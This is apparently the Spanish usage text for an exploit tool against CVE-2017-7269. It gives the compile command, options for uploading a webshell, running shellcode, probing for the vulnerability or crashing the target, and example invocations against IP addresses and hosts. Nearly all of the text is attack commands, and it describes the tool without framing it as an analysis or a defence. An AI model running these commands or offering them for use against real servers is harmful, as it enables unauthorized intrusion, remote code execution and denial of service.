
CVE-2017-7269 a webshell o cargador de shellcode
csc cve-2017-7269.cs
CVE-2017-7269 <url> [parms]
Header:
-h <host> especifica el host para la cabecera [If]
-p <port> especifica el puerto para la cabecera [If]
-s <scheme> especifica el esquema para la cabecera [If]
-l <length> longitud de la ruta física
WebShell:
-w <webshell> sube webshell al servidor
-wp <shellpath> ruta donde se guardará la webshell
ShellCode:
-c <shellcode> ejecuta el shellcode
Misc:
-t solo prueba vulnerabilidad
-e sale del proceso al obtener shell o probar
-k mata objetivo (equivalente a -e y -t)
CVE-2017-7269 http://192.168.1.1/
CVE-2017-7269 http://192.168.1.1/ -l 19
CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin